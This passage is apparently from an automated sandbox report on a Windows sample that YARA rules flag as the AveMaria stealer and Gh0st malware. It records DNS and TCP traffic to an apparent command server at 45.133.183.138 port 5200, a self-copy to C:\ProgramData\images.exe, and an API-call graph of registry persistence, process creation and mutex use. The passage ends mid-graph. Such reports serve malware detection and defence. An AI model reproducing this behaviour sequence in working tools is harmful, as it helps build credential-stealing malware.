                                    XmlLite.dllCreateXmlWriterOutputWithEncodingCodePage

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 9, 2019 09:33:04.257024050 CET4916953192.168.1.168.8.8.8
                                    Dec 9, 2019 09:33:04.280456066 CET53491698.8.8.8192.168.1.16
                                    Dec 9, 2019 09:33:04.280795097 CET4916953192.168.1.168.8.8.8
                                    Dec 9, 2019 09:33:06.305363894 CET53491698.8.8.8192.168.1.16
                                    Dec 9, 2019 09:33:06.308520079 CET4916953192.168.1.168.8.8.8
                                    Dec 9, 2019 09:33:07.911324024 CET4916953192.168.1.168.8.8.8
                                    Dec 9, 2019 09:34:04.358297110 CET4917053192.168.1.168.8.8.8
                                    Dec 9, 2019 09:34:04.381735086 CET53491708.8.8.8192.168.1.16
                                    Dec 9, 2019 09:34:04.382009029 CET4917053192.168.1.168.8.8.8
                                    Dec 9, 2019 09:34:06.405953884 CET53491708.8.8.8192.168.1.16
                                    Dec 9, 2019 09:34:06.406146049 CET4917053192.168.1.168.8.8.8
                                    Dec 9, 2019 09:34:08.325558901 CET491715200192.168.1.1645.133.183.138
                                    Dec 9, 2019 09:34:11.324734926 CET491715200192.168.1.1645.133.183.138
                                    Dec 9, 2019 09:34:15.368417978 CET4917253192.168.1.168.8.8.8
                                    Dec 9, 2019 09:34:15.391953945 CET53491728.8.8.8192.168.1.16
                                    Dec 9, 2019 09:34:15.392064095 CET4917253192.168.1.168.8.8.8

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 9, 2019 09:32:03.925107002 CET5703453192.168.1.168.8.8.8
                                    Dec 9, 2019 09:32:03.966739893 CET53570348.8.8.8192.168.1.16
                                    Dec 9, 2019 09:32:03.974251986 CET6306853192.168.1.168.8.8.8
                                    Dec 9, 2019 09:32:04.007591009 CET53630688.8.8.8192.168.1.16
                                    Dec 9, 2019 09:32:04.150613070 CET5216253192.168.1.168.8.8.8
                                    Dec 9, 2019 09:32:04.174222946 CET53521628.8.8.8192.168.1.16
                                    Dec 9, 2019 09:32:05.150875092 CET5216253192.168.1.168.8.8.8
                                    Dec 9, 2019 09:32:05.176254034 CET53521628.8.8.8192.168.1.16
                                    Dec 9, 2019 09:32:06.168806076 CET5216253192.168.1.168.8.8.8
                                    Dec 9, 2019 09:32:06.192899942 CET53521628.8.8.8192.168.1.16
                                    Dec 9, 2019 09:32:08.166450024 CET5216253192.168.1.168.8.8.8
                                    Dec 9, 2019 09:32:08.189980984 CET53521628.8.8.8192.168.1.16
                                    Dec 9, 2019 09:32:12.166918993 CET5216253192.168.1.168.8.8.8
                                    Dec 9, 2019 09:32:12.190679073 CET53521628.8.8.8192.168.1.16
                                    Dec 9, 2019 09:33:16.274024963 CET5213753192.168.1.168.8.8.8
                                    Dec 9, 2019 09:33:16.297591925 CET53521378.8.8.8192.168.1.16
                                    Dec 9, 2019 09:33:17.260957003 CET5213753192.168.1.168.8.8.8
                                    Dec 9, 2019 09:33:17.284552097 CET53521378.8.8.8192.168.1.16
                                    Dec 9, 2019 09:33:18.260999918 CET5213753192.168.1.168.8.8.8
                                    Dec 9, 2019 09:33:18.284573078 CET53521378.8.8.8192.168.1.16
                                    Dec 9, 2019 09:33:20.261075974 CET5213753192.168.1.168.8.8.8
                                    Dec 9, 2019 09:33:20.288018942 CET53521378.8.8.8192.168.1.16
                                    Dec 9, 2019 09:33:24.260509968 CET5213753192.168.1.168.8.8.8
                                    Dec 9, 2019 09:33:24.284087896 CET53521378.8.8.8192.168.1.16

                                    Code Manipulations

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: 4ifN8B061M.exe PID: 3380 Parent PID: 2596

                                    General

                                    Start time:09:31:45
                                    Start date:09/12/2019
                                    Path:C:\Users\user\Desktop\4ifN8B061M.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Users\user\Desktop\4ifN8B061M.exe'
                                    Imagebase:0x12e0000
                                    File size:874592 bytes
                                    MD5 hash:94FF625253B3920FE5B6824BD8C30482
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: images.exe PID: 3596 Parent PID: 3380

                                    General

                                    Start time:09:32:44
                                    Start date:09/12/2019
                                    Path:C:\ProgramData\images.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\ProgramData\images.exe
                                    Imagebase:0xcc0000
                                    File size:874592 bytes
                                    MD5 hash:94FF625253B3920FE5B6824BD8C30482
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.565700412.0013A000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.565700412.0013A000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.567703677.0013A000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.567703677.0013A000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Author: Florian Roth
                                    • Rule: Codoso_Gh0st_1_RID2C2D, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: images.exe PID: 3804 Parent PID: 1440

                                    General

                                    Start time:09:32:55
                                    Start date:09/12/2019
                                    Path:C:\ProgramData\images.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\ProgramData\images.exe'
                                    Imagebase:0xcc0000
                                    File size:874592 bytes
                                    MD5 hash:94FF625253B3920FE5B6824BD8C30482
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: 4ifN8B061M.exe PID: 3380 Parent PID: 2596 4ifN8B061M.exeUNIQUE

                                      Execution Graph

                                      Execution Coverage:5.3%
                                      Dynamic/Decrypted Code Coverage:65.5%
                                      Signature Coverage:3.9%
                                      Total number of Nodes:1100
                                      Total number of Limit Nodes:42

                                      Graph

                                      execution_graph 27288 25c987 InitializeCriticalSection 27328 255adb GetProcessHeap HeapAlloc 27288->27328 27290 25c9cf 27329 25312c 27290->27329 27293 25312c 9 API calls 27294 25ca18 27293->27294 27339 25dbf3 GetCurrentProcess 27294->27339 27297 25ca57 27342 253001 27297->27342 27298 25ca22 27299 25312c 9 API calls 27298->27299 27301 25ca2e 27299->27301 27304 253001 5 API calls 27301->27304 27306 25ca38 27304->27306 27308 253264 3 API calls 27306->27308 27309 25ca45 27308->27309 27362 255a2d VirtualFree 27309->27362 27313 25ca4d 27315 25312c 9 API calls 27313->27315 27314 253297 9 API calls 27316 25ca8b 27314->27316 27317 25ca55 27315->27317 27361 25d70f SHCreateDirectoryExW 27316->27361 27354 253297 27317->27354 27319 25ca92 27320 253264 3 API calls 27319->27320 27321 25ca9f 27320->27321 27322 253297 9 API calls 27321->27322 27323 25caab 27322->27323 27324 253297 9 API calls 27323->27324 27325 25cab8 27324->27325 27326 253297 9 API calls 27325->27326 27327 25cac0 27326->27327 27328->27290 27330 25313d 27329->27330 27331 253138 27329->27331 27364 253412 lstrlenW 27330->27364 27377 255a2d VirtualFree 27331->27377 27334 25314b 27369 253162 27334->27369 27336 253153 27376 255a2d VirtualFree 27336->27376 27338 25315b 27338->27293 27396 25ebd4 GetModuleHandleA GetProcAddress 27339->27396 27399 251052 27342->27399 27345 253412 4 API calls 27346 253048 27345->27346 27347 253264 27346->27347 27348 253276 27347->27348 27349 25328f 27347->27349 27401 2531b1 27348->27401 27363 255a2d VirtualFree 27349->27363 27351 25327d 27352 2559aa VirtualAlloc 27351->27352 27353 253284 lstrcpyW 27352->27353 27353->27349 27355 253412 4 API calls 27354->27355 27356 2532a8 27355->27356 27357 253162 5 API calls 27356->27357 27358 2532b0 27357->27358 27404 255a2d VirtualFree 27358->27404 27360 2532b8 27360->27314 27361->27319 27362->27313 27363->27317 27378 2559aa VirtualAlloc 27364->27378 27366 25342d lstrlenW 27380 255ab9 27366->27380 27368 253447 lstrcpyW 27368->27334 27382 25308e 27369->27382 27371 253174 27372 25308e lstrlenW 27371->27372 27373 25317d 27372->27373 27385 2559ce 27373->27385 27376->27338 27377->27330 27379 2559c8 27378->27379 27379->27366 27381 255ac5 27380->27381 27381->27368 27383 253093 lstrlenW 27382->27383 27384 25309c 27382->27384 27383->27371 27384->27371 27386 2559e4 27385->27386 27387 2559e9 27385->27387 27393 25598a VirtualQuery 27386->27393 27388 2559f9 27387->27388 27394 255a3c VirtualAlloc 27387->27394 27391 25318d lstrcatW 27388->27391 27395 255a2d VirtualFree 27388->27395 27391->27336 27393->27387 27394->27388 27395->27391 27397 25ca1d 27396->27397 27398 25ebfa IsWow64Process 27396->27398 27397->27297 27397->27298 27398->27397 27400 25105a ExpandEnvironmentStringsW 27399->27400 27400->27345 27402 2531b6 27401->27402 27403 2531b9 lstrlenW 27401->27403 27402->27351 27403->27351 27404->27360 27405 230000 27407 230005 27405->27407 27410 23002d 27407->27410 27433 230467 GetPEB 27410->27433 27413 230467 GetPEB 27414 230053 27413->27414 27415 230467 GetPEB 27414->27415 27416 230061 27415->27416 27417 230467 GetPEB 27416->27417 27418 23006d 27417->27418 27419 230467 GetPEB 27418->27419 27420 23007b 27419->27420 27421 230467 GetPEB 27420->27421 27424 230089 27421->27424 27422 2300e6 GetNativeSystemInfo 27423 230109 VirtualAlloc 27422->27423 27431 230029 27422->27431 27429 230135 27423->27429 27424->27422 27424->27431 27425 2301c3 LoadLibraryA 27425->27429 27426 2303c3 27435 260e1e 27426->27435 27427 23023c 27427->27426 27430 230384 VirtualProtect 27427->27430 27428 230207 GetProcAddress 27428->27429 27429->27425 27429->27427 27429->27428 27430->27427 27430->27431 27434 230045 27433->27434 27434->27413 27436 260e27 CreateThread 27435->27436 27437 260e39 27435->27437 27436->27437 27438 25586a GetCommandLineA 27436->27438 27437->27431 27439 25587f GetStartupInfoA 27438->27439 27447 2558f8 27439->27447 27442 2558cb 27443 2558da GetModuleHandleA 27442->27443 27450 2611d0 27443->27450 27445 2558e9 27446 2558f0 ExitProcess 27445->27446 27500 255816 GetProcessHeap HeapAlloc 27447->27500 27449 255907 27449->27442 27451 2611f4 27450->27451 27452 2611fd GetTickCount 27451->27452 27501 251085 27452->27501 27454 261209 RegCreateKeyExA RegSetValueExA RegSetValueExA RegCloseKey 27502 2555a0 Sleep 27454->27502 27460 261296 27461 2612a9 SHGetFolderPathW lstrcatW CreateDirectoryW 27460->27461 27462 261307 27461->27462 27463 2612e7 27461->27463 27464 26131c 27462->27464 27466 25db97 4 API calls 27462->27466 27631 25db97 GetCurrentProcess OpenProcessToken 27463->27631 27467 261377 27464->27467 27636 25f0c8 27464->27636 27469 261312 27466->27469 27470 261382 27467->27470 27735 25fcd9 22 API calls 27467->27735 27469->27464 27473 261317 27469->27473 27736 254a83 78 API calls 27470->27736 27472 2612f1 27729 25d4b8 LoadLibraryA GetProcAddress 27472->27729 27732 260d9d GetProcessHeap HeapAlloc GetModuleFileNameA WinExec 27473->27732 27479 261375 27717 254820 27479->27717 27480 26133c 27706 25345a 27480->27706 27481 2612f6 27484 261302 27481->27484 27485 2612fb 27481->27485 27731 25f843 22 API calls 27484->27731 27730 25f8c0 27 API calls 27485->27730 27486 26139a 27490 25f069 VirtualFree GetProcessHeap HeapFree RegCloseKey 27486->27490 27493 2613a3 27490->27493 27492 261300 27492->27462 27495 25579e VirtualFree GetProcessHeap HeapFree 27493->27495 27498 2613ac 27495->27498 27497 26136e 27734 255a2d VirtualFree 27497->27734 27498->27445 27500->27449 27501->27454 27737 25e3ed 27502->27737 27514 2555f7 27776 252e79 27514->27776 27516 255603 27779 252ccc 27516->27779 27518 25560f 27783 252e66 27518->27783 27525 253264 3 API calls 27526 25563d 27525->27526 27808 255a2d VirtualFree 27526->27808 27528 255645 27529 25fc1e 9 API calls 27528->27529 27530 255664 27529->27530 27531 253264 3 API calls 27530->27531 27532 255671 27531->27532 27809 255a2d VirtualFree 27532->27809 27534 255679 27535 25fc1e 9 API calls 27534->27535 27536 255698 27535->27536 27537 253264 3 API calls 27536->27537 27538 2556a5 27537->27538 27810 255a2d VirtualFree 27538->27810 27540 2556ad 27541 25fc1e 9 API calls 27540->27541 27542 2556cc 27541->27542 27543 253264 3 API calls 27542->27543 27544 2556d9 27543->27544 27811 255a2d VirtualFree 27544->27811 27546 2556e1 27547 25fc1e 9 API calls 27546->27547 27548 25571f 27547->27548 27549 253264 3 API calls 27548->27549 27550 25572c 27549->27550 27812 255a2d VirtualFree 27550->27812 27552 25573c 27553 252e66 2 API calls 27552->27553 27554 255744 27553->27554 27555 252e66 2 API calls 27554->27555 27556 25574c 27555->27556 27557 255759 27556->27557 27820 251db4 GetProcessHeap HeapFree 27556->27820 27559 252e66 2 API calls 27557->27559 27560 25576c 27559->27560 27813 25de8b 27560->27813 27563 25f2ad 27907 2522ee 27563->27907 27566 25db97 4 API calls 27567 25f2c9 27566->27567 27568 253412 4 API calls 27567->27568 27569 25f2f5 27568->27569 27570 253264 3 API calls 27569->27570 27571 25f2fd 27570->27571 27922 255a2d VirtualFree 27571->27922 27573 25f305 27574 25345a 3 API calls 27573->27574 27575 25f311 27574->27575 27576 253162 5 API calls 27575->27576 27577 25f31c 27576->27577 27923 255a2d VirtualFree 27577->27923 27579 25f324 27580 253412 4 API calls 27579->27580 27581 25f331 27580->27581 27582 253264 3 API calls 27581->27582 27583 25f33a 27582->27583 27924 255a2d VirtualFree 27583->27924 27585 25f342 27586 253412 4 API calls 27585->27586 27587 25f34f 27586->27587 27588 253264 3 API calls 27587->27588 27589 25f358 27588->27589 27925 255a2d VirtualFree 27589->27925 27591 25f360 27592 253412 4 API calls 27591->27592 27593 25f36d 27592->27593 27594 253264 3 API calls 27593->27594 27595 25f376 27594->27595 27926 255a2d VirtualFree 27595->27926 27597 25f37e 27927 25effe 27597->27927 27600 25f438 27624 254b0f 27600->27624 27601 25f430 27605 252e66 2 API calls 27601->27605 27603 25f3b9 27607 252e79 2 API calls 27603->27607 27623 25f406 27603->27623 27605->27600 27609 25f3ce 27607->27609 27608 253264 3 API calls 27610 25f428 27608->27610 27611 2554a5 8 API calls 27609->27611 27948 255a2d VirtualFree 27610->27948 27613 25f3d8 27611->27613 27614 255c32 4 API calls 27613->27614 27615 25f3e0 27614->27615 27937 252d08 6 API calls 27615->27937 27617 25f3ea 27618 253264 3 API calls 27617->27618 27619 25f3f3 27618->27619 27938 255a2d VirtualFree 27619->27938 27621 25f3fb 27622 252e66 2 API calls 27621->27622 27622->27623 27623->27601 27939 25d425 27623->27939 27955 255467 27624->27955 27626 254b23 27960 251d11 27626->27960 27632 25dbda 27631->27632 27633 25dbba GetTokenInformation 27631->27633 27634 25dbe0 CloseHandle 27632->27634 27635 25dbe9 27632->27635 27633->27632 27634->27635 27635->27462 27635->27472 27637 25d425 10 API calls 27636->27637 27638 25f0db 27637->27638 27979 2532d4 27638->27979 27643 25ef4c RegCloseKey 27644 25f0fd 27643->27644 27645 25f1c3 27644->27645 27988 25d75b 27644->27988 27646 25f1df 27645->27646 27648 25effe 5 API calls 27645->27648 27650 25f257 27646->27650 27652 25f1f5 27646->27652 27655 253264 3 API calls 27646->27655 27648->27646 27653 253412 4 API calls 27650->27653 27651 253264 3 API calls 27654 25f126 27651->27654 27656 25effe 5 API calls 27652->27656 27657 25f262 27653->27657 27993 255a2d VirtualFree 27654->27993 27655->27652 27659 25f20a 27656->27659 27660 253412 4 API calls 27657->27660 27662 25f294 27659->27662 27666 25345a 3 API calls 27659->27666 27663 25f26f 27660->27663 27661 25f12e 27994 25d70f SHCreateDirectoryExW 27661->27994 28011 255a2d VirtualFree 27662->28011 27667 253162 5 API calls 27663->27667 27670 25f21e 27666->27670 27671 25f278 27667->27671 27668 25f29c 28012 255a2d VirtualFree 27668->28012 27669 25f135 27673 25345a 3 API calls 27669->27673 28004 252e0a 27670->28004 28009 255a2d VirtualFree 27671->28009 27678 25f141 27673->27678 27676 25f280 DeleteFileW 28010 255a2d VirtualFree 27676->28010 27677 25f2a4 27677->27467 27677->27480 27682 253297 9 API calls 27678->27682 27680 25efcb RegSetValueExW 27683 25f239 27680->27683 27684 25f14d 27682->27684 28013 255a2d VirtualFree 27683->28013 27686 253162 5 API calls 27684->27686 27687 25f158 27686->27687 27995 255a2d VirtualFree 27687->27995 27688 25f243 27690 252e66 2 API calls 27688->27690 27692 25f24b 27690->27692 27691 25f160 CopyFileW 27691->27662 27693 25f174 27691->27693 27692->27662 27695 25ef4c RegCloseKey 27692->27695 27996 25304e 27693->27996 27695->27650 27697 2554a5 8 API calls 27698 25f189 27697->27698 27699 255c32 4 API calls 27698->27699 27700 25f191 27699->27700 27701 25effe 5 API calls 27700->27701 27702 25f1aa 27701->27702 28001 25efcb 27702->28001 27705 252e66 2 API calls 27705->27645 27707 25346c 27706->27707 27708 25348a 27706->27708 27709 25308e lstrlenW 27707->27709 27713 25eb77 27708->27713 27710 253473 27709->27710 28051 255a3c VirtualAlloc 27710->28051 27712 25347f lstrcpyW 27712->27708 27714 251052 27713->27714 27715 25eb8f CreateProcessW 27714->27715 27716 25ebbc 27715->27716 27733 255a2d VirtualFree 27716->27733 28052 255a2d VirtualFree 27717->28052 27719 254834 28053 25579e 27719->28053 27721 25483f WSACleanup 27723 25e221 ReleaseMutex CloseHandle 27721->27723 27724 255121 27723->27724 27725 252e66 GetProcessHeap HeapFree 27724->27725 27726 255129 27725->27726 27727 252e66 GetProcessHeap HeapFree 27726->27727 27728 255131 27727->27728 27729->27481 27730->27492 27731->27462 27732->27464 27733->27497 27734->27479 27735->27470 27736->27479 27821 25de6c 27737->27821 27741 2555c4 27742 25fbfc 27741->27742 27743 25fc02 27742->27743 27744 25fc08 MessageBoxA 27743->27744 27745 2555c9 27743->27745 27744->27745 27746 25e2e4 27745->27746 27747 2555d2 27746->27747 27748 25e300 27746->27748 27759 2531ec lstrlenA 27747->27759 27748->27747 27749 25e37d 27748->27749 27750 25e31f 27748->27750 27749->27747 27752 252dc1 6 API calls 27749->27752 27826 252dc1 27750->27826 27758 25e39b 27752->27758 27754 25e335 27754->27747 27829 25ea61 27754->27829 27833 2521ba 27754->27833 27755 25ea61 6 API calls 27755->27758 27757 2521ba 6 API calls 27757->27758 27758->27747 27758->27755 27758->27757 27760 2531ff lstrlenA 27759->27760 27761 25321b 27759->27761 27762 2559aa VirtualAlloc 27760->27762 27764 25e257 27761->27764 27763 25320f lstrcpyA 27762->27763 27763->27761 27770 25e269 27764->27770 27773 2555ef 27764->27773 27767 2531ec 4 API calls 27767->27770 27770->27767 27771 252e66 2 API calls 27770->27771 27772 25e2ce 27770->27772 27770->27773 27856 25582b LoadLibraryA GetProcAddress 27770->27856 27861 25ea97 27770->27861 27864 2531d0 lstrcmpA 27770->27864 27865 255a2d VirtualFree 27770->27865 27771->27770 27866 2522c2 LoadLibraryA GetProcAddress ExitProcess GetProcessHeap RtlAllocateHeap 27772->27866 27775 255a2d VirtualFree 27773->27775 27775->27514 27867 255a87 GetProcessHeap RtlAllocateHeap 27776->27867 27778 252e8b 27778->27516 27780 252ce4 27779->27780 27782 252ce9 27779->27782 27868 255a87 GetProcessHeap RtlAllocateHeap 27780->27868 27782->27518 27784 252e74 27783->27784 27785 252e6f 27783->27785 27787 2554f2 27784->27787 27869 255a76 GetProcessHeap HeapFree 27785->27869 27870 252c85 27787->27870 27790 252e79 2 API calls 27791 255525 27790->27791 27877 2554a5 27791->27877 27796 252e66 2 API calls 27797 255542 27796->27797 27798 25fc1e 27797->27798 27799 25fc32 27798->27799 27807 255633 27798->27807 27900 255adb GetProcessHeap HeapAlloc 27799->27900 27801 25fc3e 27802 253412 4 API calls 27801->27802 27803 25fc61 27802->27803 27804 253264 3 API calls 27803->27804 27805 25fc69 27804->27805 27901 255a2d VirtualFree 27805->27901 27807->27525 27808->27528 27809->27534 27810->27540 27811->27546 27812->27552 27902 25e0c3 27813->27902 27817 25de9b 27906 255a2d VirtualFree 27817->27906 27819 255774 27819->27563 27820->27557 27825 25e236 CreateMutexA 27821->27825 27823 25de7c 27824 255adb GetProcessHeap HeapAlloc 27823->27824 27824->27741 27825->27823 27845 255a4d 27826->27845 27828 252dd7 27828->27754 27830 25ea7a 27829->27830 27831 252dc1 6 API calls 27830->27831 27832 25ea8f 27831->27832 27832->27754 27834 2521d4 27833->27834 27842 252288 27833->27842 27854 255adb GetProcessHeap HeapAlloc 27834->27854 27836 252ccc 2 API calls 27837 2522b0 27836->27837 27838 252e66 2 API calls 27837->27838 27839 2522bb 27838->27839 27839->27754 27840 252279 27840->27842 27855 251db4 GetProcessHeap HeapFree 27840->27855 27841 2521fd 27841->27840 27844 252ccc 2 API calls 27841->27844 27842->27836 27844->27841 27846 255a51 GetProcessHeap RtlAllocateHeap 27845->27846 27847 255a58 27845->27847 27846->27828 27849 255a64 GetProcessHeap HeapReAlloc 27847->27849 27850 255a5c 27847->27850 27849->27828 27853 255a76 GetProcessHeap HeapFree 27850->27853 27852 255a61 27852->27828 27853->27852 27854->27841 27855->27842 27857 255869 27856->27857 27858 25584a 27856->27858 27857->27770 27859 255861 ExitProcess 27858->27859 27860 25584e 27858->27860 27860->27859 27862 252ccc 2 API calls 27861->27862 27863 25eabf 27862->27863 27863->27770 27864->27770 27865->27770 27866->27773 27867->27778 27868->27782 27869->27784 27898 255a87 GetProcessHeap RtlAllocateHeap 27870->27898 27872 252c94 27873 252dc1 6 API calls 27872->27873 27874 252cbd 27873->27874 27899 255a76 GetProcessHeap HeapFree 27874->27899 27876 252cc4 27876->27790 27878 2554b7 27877->27878 27886 2554d9 27877->27886 27879 252c85 8 API calls 27878->27879 27881 2554c9 27879->27881 27880 252e79 2 API calls 27882 2554e9 27880->27882 27883 252ccc 2 API calls 27881->27883 27887 255c32 27882->27887 27884 2554d1 27883->27884 27885 252e66 2 API calls 27884->27885 27885->27886 27886->27880 27888 252e79 2 API calls 27887->27888 27889 255c4a 27888->27889 27890 252e79 2 API calls 27889->27890 27891 255c8a 27890->27891 27892 252e66 2 API calls 27891->27892 27893 255c92 27892->27893 27894 252e66 2 API calls 27893->27894 27895 255c9a 27894->27895 27896 252e66 2 API calls 27895->27896 27897 255537 27896->27897 27897->27796 27898->27872 27899->27876 27900->27801 27901->27807 27903 25e0cc CloseHandle 27902->27903 27904 25de93 27902->27904 27903->27904 27905 25e221 ReleaseMutex CloseHandle 27904->27905 27905->27817 27906->27819 27908 252ccc 2 API calls 27907->27908 27909 252310 27908->27909 27910 253264 3 API calls 27909->27910 27911 25231c 27910->27911 27912 253264 3 API calls 27911->27912 27913 252334 27912->27913 27914 253264 3 API calls 27913->27914 27915 252346 27914->27915 27916 253264 3 API calls 27915->27916 27917 252352 27916->27917 27918 253264 3 API calls 27917->27918 27919 252364 27918->27919 27920 252ccc 2 API calls 27919->27920 27921 252388 27920->27921 27921->27566 27922->27573 27923->27579 27924->27585 27925->27591 27926->27597 27928 25f010 27927->27928 27929 25f043 RegOpenKeyExW 27927->27929 27949 25d721 RegOpenKeyExW RegCloseKey 27928->27949 27931 25f057 27929->27931 27931->27600 27931->27623 27936 25ef61 10 API calls 27931->27936 27932 25f01a 27932->27929 27933 25f01e RegCreateKeyExW 27932->27933 27933->27931 27934 25f03c 27933->27934 27950 25ef4c 27934->27950 27936->27603 27937->27617 27938->27621 27953 255adb GetProcessHeap HeapAlloc 27939->27953 27941 25d437 GetModuleFileNameW 27942 253412 4 API calls 27941->27942 27943 25d453 27942->27943 27944 253264 3 API calls 27943->27944 27945 25d45b 27944->27945 27954 255a2d VirtualFree 27945->27954 27947 25d463 27947->27608 27948->27601 27949->27932 27951 25ef54 RegCloseKey 27950->27951 27952 25ef5c 27950->27952 27951->27952 27952->27929 27953->27941 27954->27947 27956 252ff0 VirtualAlloc 27955->27956 27957 255470 27956->27957 27978 25e236 CreateMutexA 27957->27978 27959 25548a WSAStartup 27959->27626 27961 252e79 2 API calls 27960->27961 27962 251d33 27961->27962 27963 25345a 3 API calls 27962->27963 27964 251d3f 27963->27964 27965 25345a 3 API calls 27964->27965 27966 251d57 27965->27966 27967 25345a 3 API calls 27966->27967 27968 251d69 27967->27968 27969 25345a 3 API calls 27968->27969 27970 251d75 27969->27970 27971 25345a 3 API calls 27970->27971 27972 251d87 27971->27972 27973 252e79 2 API calls 27972->27973 27974 251dab 27973->27974 27975 252ff0 27974->27975 27976 2559aa VirtualAlloc 27975->27976 27977 252ffb 27976->27977 27977->27460 27978->27959 28014 2510ad GetProcessHeap HeapAlloc 27979->28014 27981 2532f0 28015 2530ec 27981->28015 27985 253341 27986 25ef0c RegCreateKeyExW 27985->27986 27987 25ef37 27986->27987 27987->27643 27989 